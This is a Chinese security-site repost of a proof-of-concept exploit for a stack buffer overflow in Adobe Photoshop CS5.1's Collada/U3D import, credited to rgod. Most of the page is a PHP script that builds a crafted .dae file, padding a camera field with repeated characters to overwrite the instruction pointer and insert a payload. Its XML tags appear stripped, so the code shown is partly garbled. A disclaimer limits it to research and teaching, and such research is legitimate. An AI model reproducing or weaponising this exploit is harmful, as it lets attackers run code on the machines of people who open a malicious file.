Adobe Photoshop CS5.1 U3D.8BI Buffer Overflow

2012-05-13 74280人围观 漏洞

小编注:Adobe公司旗下的Photoshop CS5.1近日被发现基于堆栈的缓冲区溢出漏洞。目前最新版本为photoshop cs6,于2012年4月24日发布。在最新版本未发现该漏洞。但是现在用cs5.1的还是非常多。

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

测试方法:

'.
       ''.
       '    '.
       '    '.
       '    rgod'.
       '    Maya 8.0 | ColladaMaya v3.02 | FCollada v3.2'.
       '    Collada Maya Export Options: bakeTransforms=0;exportPolygonMeshes=1;bakeLighting=0;isSampling=0;'.
       '      curveConstrainSampling=0;exportCameraAsLookat=0;'.
       '      exportLights=1;exportCameras=1;exportJointsAndSkin=1;'.
       '      exportAnimations=1;exportTriangles=1;exportInvisibleNodes=0;'.
       '      exportNormals=1;exportTexCoords=1;exportVertexColors=1;exportTangents=0;'.
       '      exportTexTangents=0;exportConstraints=1;exportPhysics=0;exportXRefs=1;'.
       '      dereferenceXRefs=0;cameraXFov=0;'.
       str_repeat("A",170).
       'cameraYFov=1;'.
       str_repeat("a",100).
       str_repeat("b",100).
       str_repeat("c",100).
       str_repeat("d",100).
       str_repeat("e",100).
       str_repeat("f",100).
       str_repeat("g",100).
       str_repeat("h",100).
       str_repeat("i",100).
       str_repeat("j",100).
       str_repeat("k",100).
       str_repeat("l",100).
       str_repeat("m",100).
        str_repeat("n",100).
"aaaabbbA".
$eip.
"ccddddeeeeffffgggghhhhiiiijjjjkkkkllllmmmmnnnnooooppppqqqqrrrrssssttttuuuuvvvvwwwwxxxxyyyy".
       '    '.
       ''.
       $payload.
       ''.
       '    '.
       '      Copyright 2012 rgod Computer Entertainment Inc.'.
       '    '.
       '    file:///C:/vs2005/sample_data/untitled'.
       '    '.
       '    2008-04-24T22:29:59Z'.
       '    2099-02-21T22:52:44Z'.
       '    '.
       '    Y_UP'.
       '  '.
       '';
file_put_contents("photoshop_sample.dae",$_xml);
echo "done";
?>

下载地址

via:sebug.net

取消
Loading...
css.php